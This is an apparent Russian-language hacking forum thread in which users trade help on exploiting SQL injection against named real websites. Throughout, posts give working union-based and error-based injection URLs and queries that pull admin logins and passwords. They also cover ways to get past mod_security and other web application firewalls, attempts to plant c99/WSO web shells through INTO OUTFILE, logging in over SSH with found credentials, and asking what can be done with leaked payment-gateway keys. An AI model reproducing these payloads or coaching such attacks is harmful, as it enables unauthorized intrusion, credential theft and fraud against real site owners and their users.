Почему?
2. Опять уязвимый сайт http://www.site.by/pages.php?id=7645
Перебираю колонки, сначала пишет he used SELECT statements have a different number of columns in query, дохожу до цифры 5, пишет Unknown column 'parent_id' in 'field list' in query. Если продолжаю перебирать колонки, опять выдает ошибку "неверное число колонок". Это иньекция или нет?


1. Сделай count(*) from BD.table

2. Error based

kingbeef said:
1. Сделай count(*) from BD.table
2. Error based


А можно подробнее? Только учусь...

billybonse said:
Неужели никто не знает, что делать?
Еще пару вопросов, если позволите.
1. нашел уязвимый сайт, http://site.com/pages.php?id=-31%20union%20select%201,2,3,4,5--, выдает цифру 4
дальше пишу http://site.com/pages.php?id=-31%20union%20select%201,2,3,version(),5-- пишет 403 Forbidden
Почему?
2. Опять уязвимый сайт http://www.site.by/pages.php?id=7645
Перебираю колонки, сначала пишет he used SELECT statements have a different number of columns in query, дохожу до цифры 5, пишет Unknown column 'parent_id' in 'field list' in query. Если продолжаю перебирать колонки, опять выдает ошибку "неверное число колонок". Это иньекция или нет?


1) Вероятно, WAF, которые чихает на version или на скобки. Проверяйте по спецсимволвам и ключевам словам.

2) Как уже сказали, возможно error-based вектор. Или же здесь несколько запросов один за другим. И попробуйте дописать комментарий в конец, если еще не.

Каким-то непонятным образом нашёл файл text.py в котором были данные для входа для пользователя sara.

Доступ оказался доступом по SSH

Зашёл и обнаружил проблему -

Из под шелла (пользователь user1):

cd home

ls -la
5 папок с датой за июль

А из под SSH(пользователь sara):

cd home

ls -la

3 папки с датой за июнь

Пытался редактировать файл из под sara - всё редактируется, но при заходе из под шелла - никаких изменений не видно.

Теперь вопрос - почему так? Почему разные даты и разное количество папок?

Вывод id

user1:

uid=510(user1) gid=500(user) groups=500(user)

user:

uid=500(user) gid=500(user) groups=500(user)

sara:

uid=501(sara) gid=501(sara) groups=501(sara),4(adm),10(wheel),500(user)

Aniweste said:
Каким-то непонятным образом нашёл файл text.py в котором были данные для входа для пользователя
sara
.
Доступ оказался доступом по
SSH
Зашёл и обнаружил проблему -
Из под шелла (пользователь
user1
):
cd home

ls -la

5 папок с датой за июль
А из под
SSH
(пользователь
sara
):
cd home

ls -la
3 папки с датой за июнь
Пытался редактировать файл из под
sara
- всё редактируется, но при заходе из под шелла - никаких изменений не видно.
Теперь вопрос - почему так? Почему разные даты и разное количество папок?
Вывод id
user1
:
uid=510(user1) gid=500(user) groups=500(user)
user
:
uid=500(user) gid=500(user) groups=500(user)
sara
:
uid=501(sara) gid=501(sara) groups=501(sara),4(adm),10(wheel),500(user)


а ты уверен, что то к чему ты подключаешся по ssh и то где web шелл это один и тот же сервер?

ph1l1ster said:
а ты уверен, что то к чему ты подключаешся по ssh и то где web шелл это один и тот же сервер?


По IP-у одинаковый

Aniweste said:
Каким-то непонятным образом нашёл файл text.py в котором были данные для входа для пользователя
sara
.
Доступ оказался доступом по
SSH
Зашёл и обнаружил проблему -
Из под шелла (пользователь
user1
):
cd home

ls -la

5 папок с датой за июль
А из под
SSH
(пользователь
sara
):
cd home

ls -la
3 папки с датой за июнь
Пытался редактировать файл из под
sara
- всё редактируется, но при заходе из под шелла - никаких изменений не видно.
Теперь вопрос - почему так? Почему разные даты и разное количество папок?
Вывод id
user1
:
uid=510(user1) gid=500(user) groups=500(user)
user
:
uid=500(user) gid=500(user) groups=500(user)
sara
:
uid=501(sara) gid=501(sara) groups=501(sara),4(adm),10(wheel),500(user)


Если вы не путаете, то на цели либо форвардинг на другую машину, либо веб в чруте. Сделайте ifconfig, netstat, поищите свои коннекты к вебу, попробуйте забиндить порт и прицепиться к нему. То есть, подтвердить то, что это одна и та же железка.

Сильно не пинайте за нубский вопрос...

Нахожу sql иньекцию, раскручиваю, просматриваю таблицы и колонки, нигде ничего похожего на user, members, accounts, passwords нет. Пароли обязательно в базе должны быть?

billybonse said:
Сильно не пинайте за нубский вопрос...
Нахожу sql иньекцию, раскручиваю, просматриваю таблицы и колонки, нигде ничего похожего на user, members, accounts, passwords нет. Пароли обязательно в базе должны быть?


1. Хранится может в другой БД

2. Стоит Basic авторизация

3. Логин/пароль хранятся в переменных

MaxFast said:
1. Хранится может в другой БД
2. Стоит Basic авторизация
3. Логин/пароль хранятся в переменных


И как его достать, если пароль в переменных или в другой БД?

billybonse said:
Сильно не пинайте за нубский вопрос...
Нахожу sql иньекцию, раскручиваю, просматриваю таблицы и колонки, нигде ничего похожего на user, members, accounts, passwords нет. Пароли обязательно в базе должны быть?


Пароли никому и ничего не должны. Как уже сказано, вариантов тут масса. Храниение паролей в таблице вроде "users" - просто общепринятый вариант.

Для начала найдите админку. Ее может и не быть вообще. Пароли могут быть жестко вписаны в исходник или может стоять basic-авторизация. В таком случае вам нужно смотреть в сторону вектора с доступом к файлам.

madhatter, спасибо за ответ.

И еще вопрос.

Нашел уязвимость, таблица phpbb_acl_users, колонка user_id

Пишу http://www.site.com/pages.php?id=-10%20union%20select%201,user_id,3,4,5,6,7,8,9,10%2 0from%20phpbb_acl_users%20limit%200,1--

Выдает ошибку Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mamacass/public_html/pages.php on line 12

Что я делаю не так?

Могу ошибаться, но комментарий в MySQL должен быть пробел два дефиса пробел и что-то еще.

TankreD said:
Могу ошибаться, но комментарий в MySQL должен быть пробел два дефиса пробел и что-то еще.


Ошибаешься

kingbeef said:
From a “-- ” sequence to the end of the line. In MySQL, the “-- ” (double-dash) comment style requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on). This syntax differs slightly from standard SQL comment syntax, as discussed in Section 1.8.2.5, “'--' as the Start of a Comment”.


Проверил. Нет, не ошибаюсь.

TankreD said:
Проверил. Нет, не ошибаюсь.


Перед однострочным комментарием должен быть.

Так же есть многострочные комментарии.

Можно обойтись и без комментариев.

Ни до, ни после однострочного комментария наличие пробела не обязательно.



kingbeef,Лучше не отвечайте, когда не знаете правильного ответа на вопрос.

billybonse,А после чего появилась такая ошибка? Что получается выводить, а что нет?


Cybersteger said:
[название бд сайта]- узнайте запросом
http://www.site.com/pages.php?id=-15+union+select+1,2,database(),4,5,6,7--


billybonse, Название БД хранится в поле TABLE_SCHEMA соответствующих таблиц.


Грабитель said:
Есть возможность крутить SQL как error-based, но все паблик способы раскрутки опять же требуют наличие запятых.
Кто подскажет, буду признателен. Благодарю за внимание.


https://rdot.org/forum/showpost.php?p=35143&postcount=40

https://rdot.org/forum/showthread.php?t=3167

Добрый день! Есть сайт MySQL error based

Смотрите, при таком запросе, нормально выдает id юзера


siste.ru/?page=19 and(select 1 from(select count(*),concat((select (select (select concat(0x27,0x7e,user.id,0x27,0x7e) from `db_site`.user Order by id limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1



Точно такой же запрос, для получения логина


site.ru/?page=19 and(select 1 from(select count(*),concat((select (select (select concat(0x27,0x7e,user.login,0x27,0x7e) from `db_site`.user Order by id limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1


На что выдает ошибку Subquery returns more than 1 row

Подскажите пожалуйста как правильно составить запрос для того чтобы вывести логин юзера

XAMEHA said:
Ни до, ни после однострочного комментария наличие пробела не обязательно.


kingbeef,Лучше не отвечайте, когда не знаете правильного ответа на вопрос.


Если имеется ввиду "--" как однострочный коммент, то в MySQL для корректной обработки запроса использование пробела в конце обязательно. Подробнее тут (http://dev.mysql.com/doc/refman/5.6/en/ansi-diff-comments.html).


Code:
mysql> select 1-- this is a comment
-> ;
+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)

mysql> select 1--this is a comment
-> ;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'a comment' at line 1

mysql> select 1--1
-> ;
+------+
| 1--1 |
+------+
| 2 |
+------+
1 row in set (0.00 sec)

Evil_Genius, а вы в mid оберните concat в подзапросе:

mid(concat(0x27,0x7e,user.login,0x27,0x7e),1,100)

XAMEHA said:
billybonse,
А после чего появилась такая ошибка? Что получается выводить, а что нет?


Таблицы и колонки вывел нормально, а когда сформировал запрос, дал ошибку. Хоть убейте, не могу понять с чем это связано. На mod_security вроде не похоже.

mailbrush said:
Если имеется ввиду "--" как однострочный коммент, то в MySQL для корректной обработки запроса использование пробела в конце обязательно.




mailbrush,Вам тоже лучше не отвечать, когда не знаете правильного ответа на вопрос. Всем лучше не отвечать, и тем более не спорить.

После -- по документации обязательно наличие пробельного символа, но не пробела. Кроме того, "--" может работать и без него:


Code:
SELECT * FROM information_schema.tables WHERE uid=1--/**/and id=3;



billybonse said:
Таблицы и колонки вывел нормально, а когда сформировал запрос, дал ошибку. Хоть убейте, не могу понять с чем это связано. На mod_security вроде не похоже.


Запутался, а на какие ваши вопросы ещё нужны ответы и к какому относится этот ответ?

То, что таблицы не существует возможно связано с тем, что имя БД берут из TABLE_SCHEMA, а не database().

ok, такой вопрос

опять нашел иньекцию, раскручиваю http://www.site.com/gallery.php?id=-3+union+select+1,table_name,3,4%20from%20informati on_schema.tables%20limit%2040,1%20--

Выдает users

Дальше пишу

http://www.site.com/gallery.php?id=-3+union+select+1,column_name,3,4%20from%20informat ion_schema.columns%20where%20table_name=%27users%2 7%20limit%200,1%20--

Пишет Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/host1222787/xn----itbkhedijai2ag0kya.xn--p1ai/htdocs/www/cgi-bin/gallery.php on line 14

В чем моя ошибка?

billybonse,Кавычки экранируются, нельзя их использовать стандартным способом в запросе. Если необходимо использовать строку, то используйте HEX (0x...).

При раскрутке обращайте внимание на строку ошибки, возможно запросов несколько.

billybonse said:
ok, такой вопрос
опять нашел иньекцию, раскручиваю http://www.site.com/gallery.php?id=-3+union+select+1,table_name,3,4%20from%20informati on_schema.tables%20limit%2040,1%20--
Выдает users
Дальше пишу
http://www.site.com/gallery.php?id=-3+union+select+1,column_name,3,4%20from%20informat ion_schema.columns%20where%20table_name=%27users%2 7%20limit%200,1%20--
Пишет Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/host1222787/xn----itbkhedijai2ag0kya.xn--p1ai/htdocs/www/cgi-bin/gallery.php on line 14
В чем моя ошибка?




Code:
http://xn----itbkhedijai2ag0kya.xn--p1ai/gallery.php?id=-3+union+select+1,group_concat(table_name),3,4+from +information_schema.tables+where+table_schema=data base()--

Тут нет таблицы users.

В соседней базе есть, но она пуста.

Прежде всего, с ходу внесу лепту в старую как мир тему с пробелами посте однострочный mysql-style комментариев. Я, может, и не тяну на уровень гроссмейстеров кавычки с красноточек, но кусок документации об этом уже привели (более того, примерно в этой же теме десятками страниц назад я его уже приводил).

В переводе на простой и всем понятный русский, после mysql-style комментария в виде двух минусов(тире\дефисов?) должен стоять пробельный символ, которым может быть перенос строки, конец строки и вообще вся веселая группа пробельных ascii-символов. Как минимум, это то, что говорит документация, и то, что подтверждается практикой на нескольких mysql-серверах пятой ветки.

Непосредственно же при инъекции пробел ставить иногда не обязательно тупо потому, что необходимый символ уже вставляется в запрос.

Касательно же пустого многострочного комментария - он заменяется на один пробел, что также может использоваться как замена пробелам.


Выдает users
Дальше пишу
http://www.site.com/gallery.php?id=-3+union+select+1,column_name,3,4%20from%20informat ion_schema.columns%20where%20table_name=%27users%2 7%20limit%200,1%20--
Пишет Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/host1222787/xn----itbkhedijai2ag0kya.xn--p1ai/htdocs/www/cgi-bin/gallery.php on line 14
В чем моя ошибка?


Таблица, вероятно, из другой базы, ваш же первый запрос выводит только имена.


Точно такой же запрос, для получения логина
Цитата:
site.ru/?page=19 and(select 1 from(select count(*),concat((select (select (select concat(0x27,0x7e,user.login,0x27,0x7e) from `db_site`.user Order by id limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
На что выдает ошибку Subquery returns more than 1 row


Как ни странно, подзапрос возвращает больше одного ряда. Используйте однозначные запросы, лимиты по возможности или concat для объединения.


madhatter, спасибо за ответ.
И еще вопрос.
Нашел уязвимость, таблица phpbb_acl_users, колонка user_id
Пишу http://www.site.com/pages.php?id=-10%20union%20select%201,user_id,3,4,5,6,7,8,9,10%2 0from%20phpbb_acl_users%20limit%200,1--
Выдает ошибку Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mamacass/public_html/pages.php on line 12
Что я делаю не так?


Запрос завернулся в false - ошибка при выполнении.

http://www.grc.tomsk.ru/

уязвимость в post параметре vote[2][]=6

time based, дальше определения имени базы "u87_sql1" неичего не получается, помогите разобраться

Br@!ns said:
http://www.grc.tomsk.ru/
уязвимость в post параметре vote[2][]=6
time based, дальше определения имени базы "u87_sql1" неичего не получается, помогите разобраться


Запрос имеет вид, дальше не крутил

6' and if(ascii(substring((database()),5,1))

Cтолкнулся с проблемой.

Залил минишелл через скулю с file_priv

пытаюсь залиться нормально.

Include - неработает

copy - неработает

file_put_contents - не работает

wget и curl тодже не работают

wget создает пустые файлы curl вообще ничего не создает.

Возможно едо в кривости рук.

Но поскажите ещё функции чтоли через которые можно скопировать код шелла с другого сервера в файл.

php 4 ветки phpinfo с xss

смог заинклудить c99 а wso никак не хочет выскаквает ошибка синтаксиса какаято.

XAMEHA said:


mailbrush,Вам тоже лучше не отвечать, когда не знаете правильного ответа на вопрос. Всем лучше не отвечать, и тем более не спорить.
После -- по документации обязательно наличие пробельного символа,
но не пробела
. Кроме того, "--" может работать и без него:

Code:
SELECT * FROM information_schema.tables WHERE uid=1--/**/and id=3;

Запутался, а на какие ваши вопросы ещё нужны ответы и к какому относится этот ответ?
То, что таблицы не существует возможно связано с тем, что имя БД берут из TABLE_SCHEMA, а не database().


From a “-- ” sequence to the end of the line. In MySQL, the “-- ” (double-dash) comment style requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on).

ХАМЕНА, Вы пишете бред: white + space это так же " "

XAMEHA said:
То, что таблицы не существует возможно связано с тем, что имя БД берут из TABLE_SCHEMA, а не database().


Что за такой тупой ответ, незачот(

Просто же можно написать, что ошибка синтаксиса через то, что таблица скорее в другой БД.

blink error based inj,

таблицы и колонки достаются нормально, но при попытке достать даные, говорит что некоторые поля несуществуют "Unknown column 'users.user_name' in 'field list'"

запрос выда


Code:
' or 1+1=0 and (select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(users.user_name as char),0x27,0x7e) FROM `mydb`.users LIMIT 0,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --

users

id

user_name

password

role

userID

email

passwd

loginEnabled

screenName

firstName

Из всех полей выводит только пассворд. Когда пробую вывести что-то другое Unknown column '' in 'field list' ...

Помогите, пожалуйста.

del. обновлено.

куда лучше записывать значения конфигураций php скрипта, в базу из файлов или в mysql ? объём маленький

например с точки зрения безопасности, бывают sql инъекции, а к файловой базе тоже могут применяться ?

В файл (не в структуру из 20-50 файлов). Это и практичнее (система с файлом работает быстрее и данные редко изменяются), и удобнее (данные для подключения к базе все равно придется где-то хранить).

Многое зависит от того, какие именно данные вы собираетесь хранить, и как с ними работать.



wkar, Может быть вы, как и billybonse взяли имя БД из database(), а не из TABLE_SCHEMA? См. ответ ниже.

wkar. Путем мыслительных процессов в хайвмайнде было решено, что база mydb в четвертом подзапросе "SELECT concat(0x7e,0x27,cast(users.user_name as char),0x27,0x7e) FROM `mydb`.users LIMIT 0,1" таки имеет таблицу users, которая из указанных имеет только поле password, а приведенный список колонок содержится в таблице users другой базы.

Совместная идея с XAMEHA.

madhatter said:
wkar
. Путем мыслительных процессов в хайвмайнде было решено, что база mydb в четвертом подзапросе "SELECT concat(0x7e,0x27,cast(users.user_name as char),0x27,0x7e) FROM `
mydb
`.users LIMIT 0,1" таки имеет таблицу users, которая из указанных имеет только поле password, а приведенный список колонок содержится в таблице users
другой
базы.


Спасибо большое за помощь, будет возможность проверить - обязательно отпишу.

2XAMEHA, скорей всего да, спасибо за подсказку.

Столкнулся с проблемой


HTML:
...id=-371+Union(Select+1,user(),3,table_name,5,6,7,8,9,1 0+from+%60information_schema%60.tables)+--+

поля для вывода присутствуют, данные о таблицах и колонках выводятся. Но при попытке вывести данные с любых других таблиц (основной базы) эти поля остаются пустыми. При неверном построении запроса, вылазиет sql ошибка, так что запросы составляю верно. Какие есть пути вытягивания данных, кроме посимвольного перебора?

Br@!ns said:
Столкнулся с проблемой

HTML:
...id=-371+Union(Select+1,user(),3,table_name,5,6,7,8,9,1 0+from+%60information_schema%60.tables)+--+

поля для вывода присутствуют, данные о таблицах и колонках выводятся. Но при попытке вывести данные с любых других таблиц (основной базы) эти поля остаются пустыми. При неверном построении запроса, вылазиет sql ошибка, так что запросы составляю верно. Какие есть пути вытягивания данных, кроме посимвольного перебора?


Error-based вектор, разумеется. Приведите, пожалуйста, запрос, выдающий пустой ответ.

Также, в ряде случаев бывает, что классический вывод на страницу раскукоживает верстку и данные не отображаются некоторыми браузерами. Проверьте на всякий случай исходник страницы.

Br@!ns said:
поля для вывода присутствуют, данные о таблицах и колонках выводятся. Но при попытке вывести данные с любых других таблиц (основной базы) эти поля остаются пустыми.


Что значит пустыми? Такого просто не бывает, причина в чем то другом, возможно в последующий обработке этих данных.

Посмотрите типы полей (COLUMN_TYPE), попробуйте count(*), length(name), hex(name) и т.п. конструкции.

Пустой ответ, например


HTML:
id=-371+Union(Select+1,staff_id,3,password,5,6,7,8,9,1 0+from+staff)+--+


в исходном коде обнаружил, что отображается полный запрос скрипта


HTML:

Br@!ns said:
Столкнулся с проблемой

HTML:
...id=-371+Union(Select+1,user(),3,table_name,5,6,7,8,9,1 0+from+%60information_schema%60.tables)+--+

поля для вывода присутствуют, данные о таблицах и колонках выводятся. Но при попытке вывести данные с любых других таблиц (основной базы) эти поля остаются пустыми. При неверном построении запроса, вылазиет sql ошибка, так что запросы составляю верно. Какие есть пути вытягивания данных, кроме посимвольного перебора?


Проблема либо в кодировке, либо в типах данных.


PHP:
aes_decrypt(aes_encrypt(column_name,1),1)

unhex(hex(column_name))

Ничего не помогает(

Вот примеры обоих запросов, уже самомоу интересно что там) глянете мб


HTML:
http://bplampsupply.com/search.php?category_id=-371+Union(Select+1,user(),3,column_name,5,6,7,8,9, 10+from+%60information_schema%60.columns+where+TAB LE_NAME='staff')+--+
http://www.bplampsupply.com/search.php?category_id=-371+Union(Select+1,staff_id,3,password,5,6,7,8,9,1 0+from+staff)+--+

Br@!ns said:
Ничего не помогает(
Вот примеры обоих запросов, уже самомоу интересно что там) глянете мб

HTML:
http://bplampsupply.com/search.php?category_id=-371+Union(Select+1,user(),3,column_name,5,6,7,8,9, 10+from+%60information_schema%60.columns+where+TAB LE_NAME='staff')+--+
http://www.bplampsupply.com/search.php?category_id=-371+Union(Select+1,staff_id,3,password,5,6,7,8,9,1 0+from+staff)+--+



У Вас таблица пустая.


PHP:
371+Union(Select+1,user(),3,table_rows,5,6,7,8,9,1 0+from+information_schema.tables+where+TABLE_NAME= 0x7374616666)+--+

Добрый день!

Помогите с построением запроса


' and(select 1 from(select count(*),concat((select (select mid( concat(file_priv),1,100) from mysql.user where user='tt') ),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1


выводится нормально N у пользователя tt

Когда хочу вывести пользователя root


' and(select 1 from(select count(*),concat((select (select mid( concat(file_priv),1,100) from mysql.user where user='root') ),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1


выводится ошибка

Обнаружены слудующие ошибки: Subquery returns more than 1 row

Подскажите как правильно составить запрос для вывода нужной инфы.

------------

Так же пробовал сделать заливку файла через скуль - опять такие не нравится((


' and(select 1 from(select count(*),concat((select (select (select mid( concat(''),1,100) from mysql.user into outfile '/home/site.ru/uploads/s.php' limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1


Выводится ошибка:

Обнаружены слудующие ошибки: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `' at line 1


' and(select 1 from(select count(*),concat((select (select mid( concat(''),1,100) from mysql.user into outfile '/home/site.ru/uploads/s.php') ),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1



так выводится

Обнаружены слудующие ошибки: Subquery returns more than 1 row

Evil_Genius said:
Так же пробовал сделать заливку файла через скуль - опять такие не нравится((


Заливка выполняется без подзапросов. См. статьи по SQL-инъекциям.

Живой пример: https://forum.antichat.net/showthread.php?p=3741323#post3741323


Evil_Genius said:
Subquery returns more than 1 row




PHP:
WHERE user='root'LIMIT 1



В таблице mysql.user несколько записей, где user='root'. Обычно у них разные хосты (localhost, 127.0.0.1, ::1, site.com, ...).

Посоветуйте пожалуйста метод заливки через error based у mysql

psihoz26 said:
Посоветуйте пожалуйста метод заливки через error based у mysql


Error-based - метод вывода информации. Для заливки вывод не нужен, используйте стандартные способы (см. ссылку выше).

Ещё есть что-то вроде такого:

https://rdot.org/forum/showpost.php?p=8510&postcount=2

Но не указаны версии, на новых данный способ неработоспособен.

У одного провайдера нашёл в конфигах следующую инфу:


CHRONOPAY_SETTINGS
{'cb_type': 'G',
'cb_url': 'https://pay.***.ru/onyma_payment_gate/chronopay_gate',
'currency': '',
'group_settings': {'5100150000***': {'cb_url': 'https://pay.***.ru/onyma_payment_gate/chronopay_gate_psi',
'product_id': '******-****-****',
'skey': '**********'},
'5100150000000000179012': {'cb_url': 'https://pay.***.ru/onyma_payment_gate/chronopay_gate_psi',
'product_id': '******-****-****',
'skey': '**********'}},
'product_id': '******-****-****',
'skey': '**************',
'submit_url': 'https://payments.chronopay.com'}


Как я понял - это кеи к платёжному шлюзу и собственно его линк.

Вопрос - что можно интересного сделать с этим ?

CHRONOPAY_SETTINGS

https://payments.chronopay.com'

чо не замазал?

BuG_4F said:
У одного провайдера нашёл в конфигах следующую инфу:
Как я понял - это кеи к платёжному шлюзу и собственно его линк.
Вопрос - что можно интересного сделать с этим ?


Лучший способ узнать ответ на этот вопрос - зайти на девелоперский раздел этого вашего хронопея и почитать доки, там обязательно будет указано большим жирным шрифтом, какие ключи являются секретными, а какие нет. Также там будет написано, что нужно сделать, для, например, перевода.

Ребята, ситуация.

Вытянул через скулю имя и пароль админа, к админке не подошел. просканил сайт, открыты ssh,80,111,443 порты. к ssh тоже не подошел пароль. В каком направлении копать?

И еще вопрос. Как обойти mod_security? Воспользовался советом /thread394724.html, начал копать union select 1 - вроде все ок, пишет кол-во таблиц не совпадает. Дальше union select 1,2 - опять ошибка mod_security.

billybonse said:
И еще вопрос. Как обойти mod_security? Воспользовался советом /thread394724.html, начал копать union select 1 - вроде все ок, пишет кол-во таблиц не совпадает. Дальше union select 1,2 - опять ошибка mod_security.


1. Не количество таблиц, а количество столбцов.

2. union select * from (select 1)a join (select 2)b...

Ребята, ситуация.
Вытянул через скулю имя и пароль админа, к админке не подошел. просканил сайт, открыты ssh,80,111,443 порты. к ssh тоже не подошел пароль. В каком направлении копать?


Вы удивитесь, но он и не должен подходить. Он пароль - он вообще никому ничего не должен. Просто часто везет так, что в базах хранят актуальные пароли. Но не всегда. Либо акутального там нет вообще, либо ищите еще. Что с file_priv и stacked queries + local load infile? В любом случае, база может дать некоторое представление о внутренней структуре.


billybonse said:
И еще вопрос. Как обойти mod_security? Воспользовался советом /thread394724.html, начал копать union select 1 - вроде все ок, пишет кол-во таблиц не совпадает. Дальше union select 1,2 - опять ошибка mod_security.


Зависит от версий. Больше скобок и комментариев, меньше пробелов - это для новых. Старые обходятся на ура через /*! */ комменатрии и замену пробелов пробельными символами. Также попробуйте в обычный комметарий вставить амперсанд - в старых, опять же версиях, он воспринимал это как новый параметр.

madhatter said:
Старые обходятся на ура через /*! */ комменатрии и замену пробелов пробельными символами.


Спасибо, обошел комментариями.

Ребят, видимо я очень глуп. Не могу найти ни количество таблиц, ни прентабельное поле

использую команду order+by

Фильтрует чтоли? или что не так делаю?


Code:
http://www.ksma.ru/news?year=2010&month=12'

Shade said:
Ребят, видимо я очень глуп. Не могу найти ни количество таблиц, ни прентабельное поле
использую команду order+by
Фильтрует чтоли? или что не так делаю?

Code:
http://www.ksma.ru/news?year=2010&month=12'



Запрос:


Code:
Select `id` From prefix_sites Where `urls` RLike '(
|^)www.ksma.ru/news?year=2013&month=01(
|$)' And `urls` != ''

Путь: D:\www\ksma\cms\includes\sql.php

Кавычки передаются в запрос в uri-encode, выйти на человеческую одиночную кавычку через utf-кунфу не получилось. Any ideas?

madhatter said:
Запрос:

Code:
Select `id` From prefix_sites Where `urls` RLike '(
|^)www.ksma.ru/news?year=2013&month=01(
|$)' And `urls` != ''

Путь: D:\www\ksma\cms\includes\sql.php
Кавычки передаются в запрос в uri-encode, выйти на человеческую одиночную кавычку через utf-кунфу не получилось. Any ideas?


Все как по учебнику. Вывод информации через error-based:


BIGINT UNSIGNED value is out of range in '((not('
5.6.12
'))

а вот еще вопросик. Чего он не показывает мне таблички?

Можно конечно через хавидж посмотреть че там есть внтури, но я учусь ручками все делать, хотелось бы получить маленькую подсказку, чтоб ковырять дальше


Code:
http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 +from+information_shema.tables+--+

Shade said:
а вот еще вопросик. Чего он не показывает мне таблички?
Можно конечно через хавидж посмотреть че там есть внтури, но я учусь ручками все делать, хотелось бы получить маленькую подсказку, чтоб ковырять дальше

Code:
http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 +from+information_shema.tables+--+



Найди отличия


http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12 +from+information_schema.tables+--

Ravenous said:
Найди отличия


о мой бог) я безграммотный чудила.. благодарю

Ребят, а что скажи вот по этому поводу??? Никакой информации выбить не смог.. если хоть что-то получится, объясните как=)


Code:
http://www.sochi-news.ru/node/9123?size=thumbnail'

вроде не слеп. SQL, но и не обычная.. люди по опытнее подскажите=)

Shade said:
Ребят, а что скажи вот по этому поводу??? Никакой информации выбить не смог.. если хоть что-то получится, объясните как=)

Code:
http://www.sochi-news.ru/node/9123?size=thumbnail'

вроде не слеп. SQL, но и не обычная.. люди по опытнее подскажите=)


Тут и подавно не пахнет никакой инъекцией.

И вообще это Drupal) Можешь проходить мимо)

http://www.babyplan.ru/index.php?app=forums&module=post&section=post&do=reply_post&t=31212&f=7

Мысли-идеи ? =)

Cennarios said:
http://www.babyplan.ru/index.php?app=forums&module=post&section=post&do=reply_post&t=31212&f=7
Мысли-идеи ? =)


babyplan@internal-www

Вот тут-то точно по учебнику. Слепая, временнАя и union в двадцать колонок без вывода(?). Впрочем, если сделать регу, то, возможно, вывод таки будет.

403 при выполненном запросе, 500 при ошибочном.

Необходима схема получения данных, да - user() удается получить но при попытке что то достать из information_schema уже не проходит. Необходимо думать, если бы все так было просто , сюда бы не постили подобные вопросы (аутентификация явно не влияет на поведение - проверено)

Cennarios said:
Необходима схема получения данных, да - user() удается получить но при попытке что то достать из information_schema уже не проходит. Необходимо думать, если бы все так было просто , сюда бы не постили подобные вопросы (аутентификация явно не влияет на поведение - проверено)


А вы не думали, что information_schema просто недоступна для этого юзера, не?

madhatter said:
А вы не думали, что information_schema просто недоступна для этого юзера, не?



Не будьте голословны, аргументируйте свое утверждение по поводу кодов ошибки рабочими примерами реквестов

Дело в том что запос падает на любом вхождении SELECT, наверняка как-то можно обойти

начал раскручивать скулю.. и столкнулся с такой проблемой

нашел 3 интерисующих меня стобца:

usr_login

usr_name

usr_pass

При запросе:


Code:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_pass),3 ,4,5,6,7,8,9,10+from+user+--+

Ничего не выводит.

А при запросе:


Code:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_name),3 ,4,5,6,7,8,9,10+from+user+--+

Выводит имя и логин пользователей(включая админа).

Вопрос: Получается вывод паролей как-то защищен? Как вывести пароль?

Shade said:
начал раскручивать скулю.. и столкнулся с такой проблемой
нашел 3 интерисующих меня стобца:
usr_login
usr_name
usr_pass
При запросе:

Code:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_pass),3 ,4,5,6,7,8,9,10+from+user+--+

Ничего не выводит.
А при запросе:

Code:
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat(usr_login,0x3a,usr_name),3 ,4,5,6,7,8,9,10+from+user+--+

Выводит имя и логин пользователей(включая админа).
Вопрос: Получается вывод паролей как-то защищен? Как вывести пароль?


Колонка usr_pass просто пуста.

PHP:
$data=array_reverse(explode("\x22",mysql_real_escape_string(substr($data,strpos($dat a,"\x22")+1))));

и далее


PHP:
UPDATE users SET data='$data[1]'

Есть вариант пихнуть что-то такое, чтобы можно было обойти экранирование кавычек и провести SQL-инжект?

Есть одна инъекция.


Code:
/-1'+union+select+1,2,3,4,user(),6,7,8,9,10+--+

Отлично выводит пользователя.


Code:
-1'+union+select+1,2,3,4,user,6,7,8,9,10+from+mysql .user+--+

Ответ - 404 Not Found

Тогда я подумал подставить валидное значение


Code:
-45742'+union+select+1,2,3,4,user,6,7,8,9,10+from+m ysql.user+--+

Ответ - 404 Not Found

Все дальнейшие запросы кроме user(), database(), version() отвечают ошибкой 404.

Тогда я подумал что это WAF. И загрязнил запрос стандартными комментариями.

Ответ - 404 Not Found

Вообще любые запросы отвечают 404.

Что это может быть?

MaxFast said:
Есть одна инъекция.

Code:
/-1'+union+select+1,2,3,4,user(),6,7,8,9,10+--+

